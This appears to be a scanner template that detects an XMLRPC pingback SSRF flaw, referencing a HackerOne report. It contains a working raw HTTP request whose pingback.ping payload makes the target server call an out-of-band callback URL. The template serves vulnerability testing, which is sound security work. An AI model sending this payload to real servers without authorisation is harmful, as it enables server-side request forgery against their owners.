id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik severity: high description: XMLRPC Pingback leads to SSRF. reference: - https://hackerone.com/reports/406387 metadata: max-request: 1 tags: xmlrpc,hackerone,ssrf,generic http: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 pingback.ping http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol words: - "http" # digest: 4b0a00483046022100b9c0df7388577f0b020d925d4faf1d98344d0fed6488b6d1500c5e703b0f54a0022100ce92f1150040cc336adbdbe2e31a4363e1973409b27ec81c125c172c155d2886:922c64590222798bb761d5b6d8e72950